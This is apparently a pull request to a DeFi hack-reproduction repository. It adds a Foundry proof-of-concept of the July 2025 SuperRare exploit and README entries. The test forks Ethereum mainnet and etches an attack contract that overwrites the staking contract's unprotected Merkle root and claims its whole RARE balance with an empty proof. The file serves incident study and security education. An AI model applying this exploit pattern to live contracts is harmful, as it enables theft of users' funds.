### PR TITLE
Add POC for SuperRare Hack on 2025-07-28. 730k USD

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-579 incidents included.
+581 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -48,6 +48,8 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20250728 SuperRare](#20250728-superrare---)
+[20250728 SuperRare](#20250728-superrare---access-control)
 [20250724 SWAPPStaking](#20250724-swappstaking---incorrect-reward-calculation)
 
 [20250709 GMX](#20250709-gmx---share-price-manipulation)
@@ -1247,6 +1249,38 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+
+### 20250728 SuperRare - 
+
+### Lost: 730K USD
+
+
+```sh
+forge test --contracts ./src/test/2025-07/SuperRare_exp.sol -vvv
+```
+#### Contract
+[SuperRare_exp.sol](src/test/2025-07/SuperRare_exp.sol)
+### Link reference
+
+
+
+---
+
+### 20250728 SuperRare - Access Control
+
+### Lost: 730K USD
+
+
+```sh
+forge test --contracts ./src/test/2025-07/SuperRare_exp.sol -vvv
+```
+#### Contract
+[SuperRare_exp.sol](src/test/2025-07/SuperRare_exp.sol)
+### Link reference
+
+
+
+---
 
 ### 20250724 SWAPPStaking - Incorrect Reward calculation
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-581 incidents included.
+580 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 

--- a/README.md
+++ b/README.md
@@ -48,8 +48,8 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
-[20250728 SuperRare](#20250728-superrare---)
 [20250728 SuperRare](#20250728-superrare---access-control)
+
 [20250724 SWAPPStaking](#20250724-swappstaking---incorrect-reward-calculation)
 
 [20250709 GMX](#20250709-gmx---share-price-manipulation)
@@ -1250,27 +1250,10 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
-### 20250728 SuperRare - 
-
-### Lost: 730K USD
-
-
-```sh
-forge test --contracts ./src/test/2025-07/SuperRare_exp.sol -vvv
-```
-#### Contract
-[SuperRare_exp.sol](src/test/2025-07/SuperRare_exp.sol)
-### Link reference
-
-
-
----
-
 ### 20250728 SuperRare - Access Control
 
 ### Lost: 730K USD
 
-
 ```sh
 forge test --contracts ./src/test/2025-07/SuperRare_exp.sol -vvv
 ```
@@ -1278,7 +1261,7 @@ forge test --contracts ./src/test/2025-07/SuperRare_exp.sol -vvv
 [SuperRare_exp.sol](src/test/2025-07/SuperRare_exp.sol)
 ### Link reference
 
-
+https://x.com/SlowMist_Team/status/1949770231733530682
 
 ---
 

--- a/src/test/2025-07/SuperRare_exp.sol
+++ b/src/test/2025-07/SuperRare_exp.sol
@@ -1,0 +1,79 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : 730K USD
+// Attacker : https://etherscan.io/address/0x5b9b4b4dafbcfceea7afba56958fcbb37d82d4a2
+// Attack Contract : https://etherscan.io/address/0x08947cedf35f9669012bda6fda9d03c399b017ab
+// Vulnerable Contract : https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC
+// Attack Tx : https://app.blocksec.com/explorer/tx/eth/0xd813751bfb98a51912b8394b5856ae4515be6a9c6e5583e06b41d9255ba6e3c1
+
+// @Info
+// Vulnerable Contract Code : https://etherscan.io/address/0xfFB512B9176D527C5D32189c3e310Ed4aB2Bb9eC#code
+
+// @Analysis
+// Post-mortem : N/A
+// Twitter Guy : https://x.com/SlowMist_Team/status/1949770231733530682
+// Hacking God : https://blog.solidityscan.com/superrare-hack-analysis-488d544d89e0
+pragma solidity ^0.8.0;
+
+address constant ERC1967Proxy = 0x3f4D749675B3e48bCCd932033808a7079328Eb48;
+address constant RARE_TOKEN = 0xba5BDe662c17e2aDFF1075610382B9B691296350;
+address constant ATTACKER = 0x5B9B4B4DaFbCfCEEa7aFbA56958fcBB37d82D4a2;
+address constant ATTACK_CONTRACT = 0x08947cedf35f9669012bDA6FdA9d03c399B017Ab;
+
+// 1753690919
+contract SuperRare is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 23016423 - 1;
+
+    function setUp() public {
+        vm.createSelectFork("mainnet", blocknumToForkFrom);
+        //Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
+        fundingToken = RARE_TOKEN;
+    }
+
+    function testExploit() public balanceLog {
+        // deploy attack contract and etch it to ATTACK_CONTRACT address
+        AttackContract acTemp = new AttackContract();
+        bytes memory code = address(acTemp).code;
+        vm.etch(ATTACK_CONTRACT, code);
+        AttackContract ac = AttackContract(ATTACK_CONTRACT);
+
+        uint256 stakingContractBalance = ac.getStakingContractBalance();
+        console.log("stakingContractBalance", stakingContractBalance);
+        // 11907874713019104529057960
+    
+        uint256 tokenBalance = ac.getTokenBalance();
+        console.log("attackContract Balance Before", tokenBalance);
+        // 0
+
+        bytes32 fakeRoot = 0x93f3c0d0d71a7c606fe87524887594a106b44c65d46fa72a42d80bd6259ade7e;
+        ac.attack(fakeRoot, stakingContractBalance);
+
+        uint256 tokenBalanceAfter = ac.getTokenBalance();
+        console.log("attackContract Balance After", tokenBalanceAfter);
+        // 11907874713019104529057960
+    }
+}
+
+contract AttackContract {
+    function getStakingContractBalance() public view returns (uint256) {
+        return IERC20(RARE_TOKEN).balanceOf(ERC1967Proxy);
+    }
+    function getTokenBalance() public view returns (uint256) {
+        return IERC20(RARE_TOKEN).balanceOf(address(this));
+    }
+    function attack(bytes32 newRoot, uint256 amout) public {
+        IERC1967Proxy target = IERC1967Proxy(ERC1967Proxy);
+        target.updateMerkleRoot(newRoot);
+        bytes32[] memory proof = new bytes32[](0);
+        target.claim(amout, proof);
+    }
+}
+
+interface IERC1967Proxy {
+    function updateMerkleRoot(bytes32 newRoot) external;
+    function claim(uint256 amount, bytes32[] calldata proof) external;
+}


### PR DESCRIPTION
The root cause for this exploit was an incorrect permission check in the updateMerkleRoot function, allowing anyone to modify the Merkle Root and claim tokens.

Source:

1. https://x.com/SlowMist_Team/status/1949770231733530682
2. https://blog.solidityscan.com/superrare-hack-analysis-488d544d89e0